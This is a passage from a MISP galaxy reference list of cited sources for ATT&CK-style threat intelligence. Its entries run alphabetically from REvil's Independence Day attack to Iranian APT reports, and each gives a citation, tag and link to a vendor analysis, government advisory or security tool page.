Loman, M. et al. (2021, July 4). Independence Day: REvil uses supply chain exploit to attack hundreds of businesses. Retrieved September 30, 2021.

The tag is: misp-galaxy:references="Revil Independence Day"

Table 13998. Table References

Links

https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/

Fortinet Agent Tesla June 2017

Zhang, X. (2017, June 28). In-Depth Analysis of A New Variant of .NET Malware AgentTesla. Retrieved November 5, 2018.

The tag is: misp-galaxy:references="Fortinet Agent Tesla June 2017"

Table 13999. Table References

Links

https://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html

NCC Group Team9 June 2020

Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020.

The tag is: misp-galaxy:references="NCC Group Team9 June 2020"

Table 14000. Table References

Links

https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/

Trend Micro APT Attack Tools

Wilhoit, K. (2013, March 4). In-Depth Look: APT Attack Tools of the Trade. Retrieved December 2, 2015.

The tag is: misp-galaxy:references="Trend Micro APT Attack Tools"

Table 14001. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/

Symantec Suckfly May 2016

DiMaggio, J. (2016, May 17). Indian organizations targeted in Suckfly attacks. Retrieved August 3, 2016.

The tag is: misp-galaxy:references="Symantec Suckfly May 2016"

Table 14002. Table References

Links

http://www.symantec.com/connect/blogs/indian-organizations-targeted-suckfly-attacks

Joint CSA AvosLocker Mar 2022

FBI, FinCEN, Treasury. (2022, March 17). Indicators of Compromise Associated with AvosLocker Ransomware. Retrieved January 11, 2023.

The tag is: misp-galaxy:references="Joint CSA AvosLocker Mar 2022"

Table 14003. Table References

Links

https://www.ic3.gov/Media/News/2022/220318.pdf

FBI Flash Diavol January 2022

FBI. (2022, January 19). Indicators of Compromise Associated with Diavol. Retrieved March 9, 2022.

The tag is: misp-galaxy:references="FBI Flash Diavol January 2022"

Table 14004. Table References

Links

https://www.ic3.gov/Media/News/2022/220120.pdf

FBI Ragnar Locker 2020

FBI. (2020, November 19). Indicators of Compromise Associated with Ragnar Locker Ransomware. Retrieved April 1, 2021.

The tag is: misp-galaxy:references="FBI Ragnar Locker 2020"

Table 14005. Table References

Links

https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf

FBI FLASH APT39 September 2020

FBI. (2020, September 17). Indicators of Compromise Associated with Rana Intelligence Computing, also known as Advanced Persistent Threat 39, Chafer, Cadelspy, Remexi, and ITG07. Retrieved December 10, 2020.

The tag is: misp-galaxy:references="FBI FLASH APT39 September 2020"

Table 14006. Table References

Links

https://www.iranwatch.org/sites/default/files/public-intelligence-alert.pdf

US District Court Indictment GRU Oct 2018

Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.

The tag is: misp-galaxy:references="US District Court Indictment GRU Oct 2018"

Table 14007. Table References

Links

https://www.justice.gov/opa/page/file/1098481/download

Checkpoint IndigoZebra July 2021

CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. Retrieved September 24, 2021.

The tag is: misp-galaxy:references="Checkpoint IndigoZebra July 2021"

Table 14008. Table References

Links

https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/

HackerNews IndigoZebra July 2021

Lakshmanan, R.. (2021, July 1). IndigoZebra APT Hacking Campaign Targets the Afghan Government. Retrieved September 24, 2021.

The tag is: misp-galaxy:references="HackerNews IndigoZebra July 2021"

Table 14009. Table References

Links

https://thehackernews.com/2021/07/indigozebra-apt-hacking-campaign.html

Check Point Meteor Aug 2021

Check Point Research Team. (2021, August 14). Indra - Hackers Behind Recent Attacks on Iran. Retrieved February 17, 2022.

The tag is: misp-galaxy:references="Check Point Meteor Aug 2021"

Table 14010. Table References

Links

https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/

Crowdstrike EvilCorp March 2021

Podlosky, A., Feeley, B. (2021, March 17). INDRIK SPIDER Supersedes WastedLocker with Hades Ransomware to Circumvent OFAC Sanctions. Retrieved September 15, 2021.

The tag is: misp-galaxy:references="Crowdstrike EvilCorp March 2021"

Table 14011. Table References

Links

https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/

Industroyer2 ESET April 2022

ESET. (2022, April 12). Industroyer2: Industroyer reloaded. Retrieved March 30, 2023.

The tag is: misp-galaxy:references="Industroyer2 ESET April 2022"

Table 14012. Table References

Links

https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/

Industroyer2 Blackhat ESET

Anton Cherepanov, Robert Lipovsky. (2022, August). Industroyer2: Sandworm’s Cyberwarfare Targets Ukraine’s Power Grid. Retrieved April 6, 2023.

The tag is: misp-galaxy:references="Industroyer2 Blackhat ESET"

Table 14013. Table References

Links

https://www.youtube.com/watch?v=xC9iM5wVedQ

Industroyer2 Mandiant April 2022

Daniel Kapellmann Zafra, Raymond Leong, Chris Sistrunk, Ken Proska, Corey Hildebrandt, Keith Lunden, Nathan Brubaker. (2022, April 25). INDUSTROYER.V2: Old Malware Learns New Tricks. Retrieved March 30, 2023.

The tag is: misp-galaxy:references="Industroyer2 Mandiant April 2022"

Table 14014. Table References

Links

https://www.mandiant.com/resources/blog/industroyer-v2-old-malware-new-tricks

Sixdub PowerPick Jan 2016

Warner, J.. (2015, January 6). Inexorable PowerShell – A Red Teamer’s Tale of Overcoming Simple AppLocker Policies. Retrieved December 8, 2018.

The tag is: misp-galaxy:references="Sixdub PowerPick Jan 2016"

Table 14015. Table References

Links

https://web.archive.org/web/20160327101330/http://www.sixdub.net/?p=367

Infdefaultinstall.exe - LOLBAS Project

LOLBAS. (2018, May 25). Infdefaultinstall.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Infdefaultinstall.exe - LOLBAS Project"

Table 14016. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/

Trend Micro Exposed Docker APIs

Oliveira, A. (2019, May 30). Infected Containers Target Docker via Exposed APIs. Retrieved April 6, 2021.

The tag is: misp-galaxy:references="Trend Micro Exposed Docker APIs"

Table 14017. Table References

Links

https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html

SentinelOne MacMa Nov 2021

Stokes, P. (2021, November 15). Infect If Needed | A Deeper Dive Into Targeted Backdoor macOS.Macma. Retrieved June 30, 2022.

The tag is: misp-galaxy:references="SentinelOne MacMa Nov 2021"

Table 14018. Table References

Links

https://www.sentinelone.com/labs/infect-if-needed-a-deeper-dive-into-targeted-backdoor-macos-macma/

SANS Information Security Reading Room Securing SNMP Securing SNMP

Michael Stump. (2003). Information Security Reading Room Securing SNMP: A Look atNet-SNMP (SNMPv3). Retrieved October 19, 2020.

The tag is: misp-galaxy:references="SANS Information Security Reading Room Securing SNMP Securing SNMP"

Table 14019. Table References

Links

https://www.sans.org/reading-room/whitepapers/networkdevs/securing-snmp-net-snmp-snmpv3-1051

Symantec Catchamas April 2018

Balanza, M. (2018, April 02). Infostealer.Catchamas. Retrieved July 10, 2018.

The tag is: misp-galaxy:references="Symantec Catchamas April 2018"

Table 14020. Table References

Links

https://www-west.symantec.com/content/symantec/english/en/security-center/writeup.html/2018-040209-1742-99

TrendMicro Ursnif File Dec 2014

Caragay, R. (2014, December 11). Info-Stealing File Infector Hits US, UK. Retrieved June 5, 2019.

The tag is: misp-galaxy:references="TrendMicro Ursnif File Dec 2014"

Table 14021. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/info-stealing-file-infector-hits-us-uk/

ThreatConnect Infrastructure Dec 2020

ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.

The tag is: misp-galaxy:references="ThreatConnect Infrastructure Dec 2020"

Table 14022. Table References

Links

https://threatconnect.com/blog/infrastructure-research-hunting/

Init Man Page

Kerrisk, M. (2021, March 22). INIT_MODULE(2). Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Init Man Page"

Table 14023. Table References

Links

https://man7.org/linux/man-pages/man2/init_module.2.html

Proofpoint RTF Injection

Raggi, M. (2021, December 1). Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors . Retrieved December 9, 2021.

The tag is: misp-galaxy:references="Proofpoint RTF Injection"

Table 14024. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-technique-poised-widespread

HighTech Bridge Inline Hooking Sept 2011

Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved December 12, 2017.

The tag is: misp-galaxy:references="HighTech Bridge Inline Hooking Sept 2011"

Table 14025. Table References

Links

https://www.exploit-db.com/docs/17802.pdf

Stuart ELF Memory

Stuart. (2018, March 31). In-Memory-Only ELF Execution (Without tmpfs). Retrieved October 4, 2021.

The tag is: misp-galaxy:references="Stuart ELF Memory"

Table 14026. Table References

Links

https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html

ASERT InnaputRAT April 2018

ASERT Team. (2018, April 04). Innaput Actors Utilize Remote Access Trojan Since 2016, Presumably Targeting Victim Files. Retrieved July 9, 2018.

The tag is: misp-galaxy:references="ASERT InnaputRAT April 2018"

Table 14027. Table References

Links

https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/

Microsoft Holmium June 2020

Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020.

The tag is: misp-galaxy:references="Microsoft Holmium June 2020"

Table 14028. Table References

Links

https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/

RiskIQ British Airways September 2018

Klijnsma, Y. (2018, September 11). Inside the Magecart Breach of British Airways: How 22 Lines of Code Claimed 380,000 Victims. Retrieved September 9, 2020.

The tag is: misp-galaxy:references="RiskIQ British Airways September 2018"

Table 14029. Table References

Links

https://web.archive.org/web/20181231220607/https://riskiq.com/blog/labs/magecart-british-airways-breach/

Arbor AnnualDoSreport Jan 2018

Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight into the Global Threat Landscape - Netscout Arbor’s 13th Annual Worldwide Infrastructure Security Report. Retrieved April 22, 2019.

The tag is: misp-galaxy:references="Arbor AnnualDoSreport Jan 2018"

Table 14030. Table References

Links

https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf

FireEye APT33 Sept 2017

O’Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.

The tag is: misp-galaxy:references="FireEye APT33 Sept 2017"

Table 14031. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html

Installer Package Scripting Rich Trouton

Rich Trouton. (2019, August 9). Installer Package Scripting: Making your deployments easier, one ! at a time. Retrieved September 27, 2022.

The tag is: misp-galaxy:references="Installer Package Scripting Rich Trouton"

Table 14032. Table References

Links

https://cpb-us-e1.wpmucdn.com/sites.psu.edu/dist/4/24696/files/2019/07/psumac2019-345-Installer-Package-Scripting-Making-your-deployments-easier-one-at-a-time.pdf

Microsoft Install Password Filter n.d

Microsoft. (n.d.). Installing and Registering a Password Filter DLL. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="Microsoft Install Password Filter n.d"

Table 14033. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/ms721766.aspx

Microsoft Unsigned Driver Apr 2017

Microsoft. (2017, April 20). Installing an Unsigned Driver during Development and Test. Retrieved April 22, 2021.

The tag is: misp-galaxy:references="Microsoft Unsigned Driver Apr 2017"

Table 14034. Table References

Links

https://docs.microsoft.com/en-us/windows-hardware/drivers/install/installing-an-unsigned-driver-during-development-and-test

LOLBAS Installutil

LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.

The tag is: misp-galaxy:references="LOLBAS Installutil"

Table 14035. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Installutil/

MSDN InstallUtil

Microsoft. (n.d.). Installutil.exe (Installer Tool). Retrieved July 1, 2016.

The tag is: misp-galaxy:references="MSDN InstallUtil"

Table 14036. Table References

Links

https://msdn.microsoft.com/en-us/library/50614e95.aspx

AWS Instance Identity Documents

Amazon. (n.d.). Instance identity documents. Retrieved April 2, 2021.

The tag is: misp-galaxy:references="AWS Instance Identity Documents"

Table 14037. Table References

Links

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html

AWS Instance Metadata API

AWS. (n.d.). Instance Metadata and User Data. Retrieved July 18, 2019.

The tag is: misp-galaxy:references="AWS Instance Metadata API"

Table 14038. Table References

Links

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html

RedLock Instance Metadata API 2018

Higashi, Michael. (2018, May 15). Instance Metadata API: A Modern Day Trojan Horse. Retrieved July 16, 2019.

The tag is: misp-galaxy:references="RedLock Instance Metadata API 2018"

Table 14039. Table References

Links

https://redlock.io/blog/instance-metadata-api-a-modern-day-trojan-horse

Nick Tyrer GitHub

Tyrer, N. (n.d.). Instructions. Retrieved August 10, 2020.

The tag is: misp-galaxy:references="Nick Tyrer GitHub"

Table 14040. Table References

Links

https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5

Intel Hardware-based Security Technologies

Intel. (2013). Intel Hardware-based Security Technologies for Intelligent Retail Devices. Retrieved May 19, 2020.

The tag is: misp-galaxy:references="Intel Hardware-based Security Technologies"

Table 14041. Table References

Links

https://www.intel.com/content/dam/www/public/us/en/documents/white-papers/security-technologies-4th-gen-core-retail-paper.pdf

Microsoft ISAPI Extension All Incoming 2017

Microsoft. (2017, June 16). Intercepting All Incoming IIS Requests. Retrieved June 3, 2021.

The tag is: misp-galaxy:references="Microsoft ISAPI Extension All Incoming 2017"

Table 14042. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525696(v=vs.90)

Clymb3r Function Hook Passwords Sept 2013

Bialek, J. (2013, September 15). Intercepting Password Changes With Function Hooking. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="Clymb3r Function Hook Passwords Sept 2013"

Table 14043. Table References

Links

https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/

Microsoft ICMP

Microsoft. (n.d.). Internet Control Message Protocol (ICMP) Basics. Retrieved December 1, 2014.

The tag is: misp-galaxy:references="Microsoft ICMP"

Table 14044. Table References

Links

http://support.microsoft.com/KB/170292

Linux IPC

N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved March 11, 2022.

The tag is: misp-galaxy:references="Linux IPC"

Table 14045. Table References

Links

https://www.geeksforgeeks.org/inter-process-communication-ipc/::text=Inter%2Dprocess%20communication%20(IPC)

HackerNews - 3 SaaS App Cyber Attacks - April 2022

Hananel Livneh. (2022, April 7). Into the Breach: Breaking Down 3 SaaS App Cyber Attacks in 2022. Retrieved May 31, 2022.

The tag is: misp-galaxy:references="HackerNews - 3 SaaS App Cyber Attacks - April 2022"

Table 14046. Table References

Links

https://thehackernews.com/2022/04/into-breach-breaking-down-3-saas-app.html

RedCanary Mockingbird May 2020

Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020.

The tag is: misp-galaxy:references="RedCanary Mockingbird May 2020"

Table 14047. Table References

Links

https://redcanary.com/blog/blue-mockingbird-cryptominer/

Fidelis Hi-Zor

Fidelis Threat Research Team. (2016, January 27). Introducing Hi-Zor RAT. Retrieved March 24, 2016.

The tag is: misp-galaxy:references="Fidelis Hi-Zor"

Table 14048. Table References

Links

https://www.fidelissecurity.com/threatgeek/archive/introducing-hi-zor-rat/

Roadtools

Dirk-jan Mollema. (2020, April 16). Introducing ROADtools - The Azure AD exploration framework. Retrieved January 31, 2022.

The tag is: misp-galaxy:references="Roadtools"

Table 14049. Table References

Links

https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/

Talos ROKRAT

Mercer, W., Rascagneres, P. (2017, April 03). Introducing ROKRAT. Retrieved May 21, 2018.

The tag is: misp-galaxy:references="Talos ROKRAT"

Table 14050. Table References

Links

https://blog.talosintelligence.com/2017/04/introducing-rokrat.html

Microsoft Open XML July 2017

Microsoft. (2014, July 9). Introducing the Office (2007) Open XML File Formats. Retrieved July 20, 2018.

The tag is: misp-galaxy:references="Microsoft Open XML July 2017"

Table 14051. Table References

Links

https://docs.microsoft.com/previous-versions/office/developer/office-2007/aa338205(v=office.12)

Securelist WhiteBear Aug 2017

Kaspersky Lab’s Global Research & Analysis Team. (2017, August 30). Introducing WhiteBear. Retrieved September 21, 2017.

The tag is: misp-galaxy:references="Securelist WhiteBear Aug 2017"

Table 14052. Table References

Links

https://securelist.com/introducing-whitebear/81638/

MalwareBytes ADS July 2015

Arntz, P. (2015, July 22). Introduction to Alternate Data Streams. Retrieved March 21, 2018.

The tag is: misp-galaxy:references="MalwareBytes ADS July 2015"

Table 14053. Table References

Links

https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/

Apple AppleScript

Apple. (2016, January 25). Introduction to AppleScript Language Guide. Retrieved March 28, 2020.

The tag is: misp-galaxy:references="Apple AppleScript"

Table 14054. Table References

Links

https://developer.apple.com/library/archive/documentation/AppleScript/Conceptual/AppleScriptLangGuide/introduction/ASLR_intro.html

Microsoft Outlook Files

Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and .ost). Retrieved February 19, 2020.

The tag is: misp-galaxy:references="Microsoft Outlook Files"

Table 14055. Table References

Links

https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790

Microsoft Intro Print Processors

Microsoft. (2023, June 26). Introduction to print processors. Retrieved September 27, 2023.

The tag is: misp-galaxy:references="Microsoft Intro Print Processors"

Table 14056. Table References

Links

https://learn.microsoft.com/windows-hardware/drivers/print/introduction-to-print-processors

Microsoft Services

Microsoft. (2017, March 30). Introduction to Windows Service Applications. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Microsoft Services"

Table 14057. Table References

Links

https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications

Red Canary NETWIRE January 2020

Lambert, T. (2020, January 29). Intro to Netwire. Retrieved January 7, 2021.

The tag is: misp-galaxy:references="Red Canary NETWIRE January 2020"

Table 14058. Table References

Links

https://redcanary.com/blog/netwire-remote-access-trojan-on-linux/

Discord Intro to Webhooks

  1. (n.d.). Intro to Webhooks. Retrieved July 20, 2023.

The tag is: misp-galaxy:references="Discord Intro to Webhooks"

Table 14059. Table References

Links

https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks

GitHub Inveigh

Robertson, K. (2015, April 2). Inveigh: Windows PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool. Retrieved March 11, 2019.

The tag is: misp-galaxy:references="GitHub Inveigh"

Table 14060. Table References

Links

https://github.com/Kevin-Robertson/Inveigh

Summit Route Malicious AMIs

Piper, S.. (2018, September 24). Investigating Malicious AMIs. Retrieved March 30, 2021.

The tag is: misp-galaxy:references="Summit Route Malicious AMIs"

Table 14061. Table References

Links

https://summitroute.com/blog/2018/09/24/investigating_malicious_amis/

inv_ps_attacks

Hastings, M. (2014, July 16). Investigating PowerShell Attacks. Retrieved December 1, 2021.

The tag is: misp-galaxy:references="inv_ps_attacks"

Table 14062. Table References

Links

https://powershellmagazine.com/2014/07/16/investigating-powershell-attacks/

Kazanciyan 2014

Kazanciyan, R. & Hastings, M. (2014). Defcon 22 Presentation. Investigating PowerShell Attacks [slides]. Retrieved November 3, 2014.

The tag is: misp-galaxy:references="Kazanciyan 2014"

Table 14063. Table References

Links

https://www.defcon.org/images/defcon-22/dc-22-presentations/Kazanciyan-Hastings/DEFCON-22-Ryan-Kazanciyan-Matt-Hastings-Investigating-Powershell-Attacks.pdf

Beek Use of VHD Dec 2020

Beek, C. (2020, December 3). Investigating the Use of VHD Files By Cybercriminals. Retrieved February 22, 2021.

The tag is: misp-galaxy:references="Beek Use of VHD Dec 2020"

Table 14064. Table References

Links

https://medium.com/swlh/investigating-the-use-of-vhd-files-by-cybercriminals-3f1f08304316

ESET InvisiMole June 2018

Hromcová, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.

The tag is: misp-galaxy:references="ESET InvisiMole June 2018"

Table 14065. Table References

Links

https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/

ESET InvisiMole June 2020

Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.

The tag is: misp-galaxy:references="ESET InvisiMole June 2020"

Table 14066. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf

GitHub OmerYa Invisi-Shell

Yair, O. (2019, August 19). Invisi-Shell. Retrieved June 24, 2020.

The tag is: misp-galaxy:references="GitHub OmerYa Invisi-Shell"

Table 14067. Table References

Links

https://github.com/OmerYa/Invisi-Shell

Invoke-DOSfuscation

Bohannon, D. (2018, March 19). Invoke-DOSfuscation. Retrieved March 17, 2023.

The tag is: misp-galaxy:references="Invoke-DOSfuscation"

Table 14068. Table References

Links

https://github.com/danielbohannon/Invoke-DOSfuscation

PowerSploit Invoke Kerberoast

Schroeder, W. & Hart M. (2016, October 31). Invoke-Kerberoast. Retrieved March 23, 2018.

The tag is: misp-galaxy:references="PowerSploit Invoke Kerberoast"

Table 14069. Table References

Links

https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/

Empire InvokeKerberoast Oct 2016

EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved March 22, 2018.

The tag is: misp-galaxy:references="Empire InvokeKerberoast Oct 2016"

Table 14070. Table References

Links

https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1

Github PowerSploit Ninjacopy

Bialek, J. (2015, December 16). Invoke-NinjaCopy.ps1. Retrieved June 2, 2016.

The tag is: misp-galaxy:references="Github PowerSploit Ninjacopy"

Table 14071. Table References

Links

https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1

Invoke-Obfuscation

Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved March 17, 2023.

The tag is: misp-galaxy:references="Invoke-Obfuscation"

Table 14072. Table References

Links

https://github.com/danielbohannon/Invoke-Obfuscation

GitHub Invoke-Obfuscation

Bohannon, D.. (2017, March 13). Invoke-Obfuscation - PowerShell Obfuscator. Retrieved June 18, 2017.

The tag is: misp-galaxy:references="GitHub Invoke-Obfuscation"

Table 14073. Table References

Links

https://github.com/danielbohannon/Invoke-Obfuscation

GitHub PSImage

Barrett Adams . (n.d.). Invoke-PSImage . Retrieved September 30, 2022.

The tag is: misp-galaxy:references="GitHub PSImage"

Table 14074. Table References

Links

https://github.com/peewpw/Invoke-PSImage

GitHub Invoke-PSImage

Adams, B. (2017, December 17). Invoke-PSImage. Retrieved April 10, 2018.

The tag is: misp-galaxy:references="GitHub Invoke-PSImage"

Table 14075. Table References

Links

https://github.com/peewpw/Invoke-PSImage

Wikipedia Xen

Xen. (n.d.). In Wikipedia. Retrieved November 13, 2014.

The tag is: misp-galaxy:references="Wikipedia Xen"

Table 14076. Table References

Links

http://en.wikipedia.org/wiki/Xen

TechNet Ipconfig

Microsoft. (n.d.). Ipconfig. Retrieved April 17, 2016.

The tag is: misp-galaxy:references="TechNet Ipconfig"

Table 14077. Table References

Links

https://technet.microsoft.com/en-us/library/bb490921.aspx

cisco_ip_ssh_pubkey_ch_cmd

Cisco. (2021, August 23). ip ssh pubkey-chain. Retrieved July 13, 2022.

The tag is: misp-galaxy:references="cisco_ip_ssh_pubkey_ch_cmd"

Table 14078. Table References

Links

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/d1/sec-d1-cr-book/sec-cr-i3.html#wp1254331478

Symantec Chafer Dec 2015

Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.

The tag is: misp-galaxy:references="Symantec Chafer Dec 2015"

Table 14079. Table References

Links

https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets

CISA AA20-259A Iran-Based Actor September 2020

CISA. (2020, September 15). Iran-Based Threat Actor Exploits VPN Vulnerabilities. Retrieved December 21, 2020.

The tag is: misp-galaxy:references="CISA AA20-259A Iran-Based Actor September 2020"

Table 14080. Table References

Links

https://us-cert.cisa.gov/ncas/alerts/aa20-259a

U.S. CISA Iran Voter Data November 3 2020

Cybersecurity and Infrastructure Security Agency. (2020, November 3). Iranian Advanced Persistent Threat Actor Identified Obtaining Voter Registration Data. Retrieved October 25, 2023.

The tag is: misp-galaxy:references="U.S. CISA Iran Voter Data November 3 2020"

Table 14081. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-304a

ClearSky MuddyWater June 2019

ClearSky. (2019, June). Iranian APT group ‘MuddyWater’ Adds Exploits to Their Arsenal. Retrieved May 14, 2020.

The tag is: misp-galaxy:references="ClearSky MuddyWater June 2019"

Table 14082. Table References

Links

https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf

Talos MuddyWater Jan 2022

Malhortra, A and Ventura, V. (2022, January 31). Iranian APT MuddyWater targets Turkish users via malicious PDFs, executables. Retrieved June 22, 2022.

The tag is: misp-galaxy:references="Talos MuddyWater Jan 2022"

Table 14083. Table References

Links

https://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html

BitDefender Chafer May 2020

Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020.

The tag is: misp-galaxy:references="BitDefender Chafer May 2020"

Table 14084. Table References

Links

https://www.bitdefender.com/blog/labs/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/

DHS CISA AA22-055A MuddyWater February 2022

FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022.

The tag is: misp-galaxy:references="DHS CISA AA22-055A MuddyWater February 2022"

Table 14085. Table References

Links

https://www.cisa.gov/uscert/ncas/alerts/aa22-055a

U.S. CISA Advisory November 25 2022

Cybersecurity and Infrastructure Security Agency. (2022, November 25). Iranian Government-Sponsored APT Actors Compromise Federal Network, Deploy Crypto Miner, Credential Harvester. Retrieved October 25, 2023.

The tag is: misp-galaxy:references="U.S. CISA Advisory November 25 2022"

Table 14086. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-320a

U.S. CISA Iranian Government Actors November 19 2021

Cybersecurity and Infrastructure Security Agency. (2021, November 19). Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities. Retrieved October 25, 2023.

The tag is: misp-galaxy:references="U.S. CISA Iranian Government Actors November 19 2021"

Table 14087. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a

NEWSCASTER2014

Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.

The tag is: misp-galaxy:references="NEWSCASTER2014"

Table 14088. Table References

Links

https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation

CYBERCOM Iranian Intel Cyber January 2022

Cyber National Mission Force. (2022, January 12). Iranian intel cyber suite of malware uses open source tools. Retrieved September 30, 2022.

The tag is: misp-galaxy:references="CYBERCOM Iranian Intel Cyber January 2022"

Table 14089. Table References

Links

https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/

U.S. CISA IRGC Actors September 14 2022

Cybersecurity and Infrastructure Security Agency. (2022, September 14). Iranian Islamic Revolutionary Guard Corps-Affiliated Cyber Actors Exploiting Vulnerabilities for Data Extortion and Disk Encryption for Ransom Operations. Retrieved October 25, 2023.

The tag is: misp-galaxy:references="U.S. CISA IRGC Actors September 14 2022"

Table 14090. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-257a

Secureworks Cobalt Gypsy Feb 2017

Counter Threat Unit Research Team. (2017, February 15). Iranian PupyRAT Bites Middle Eastern Organizations. Retrieved December 27, 2017.

The tag is: misp-galaxy:references="Secureworks Cobalt Gypsy Feb 2017"

Table 14091. Table References

Links

https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations

ClearSky OilRig Jan 2017

ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017.

The tag is: misp-galaxy:references="ClearSky OilRig Jan 2017"

Table 14092. Table References

Links

http://www.clearskysec.com/oilrig/

FireEye MuddyWater Mar 2018

Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="FireEye MuddyWater Mar 2018"

Table 14093. Table References

Links

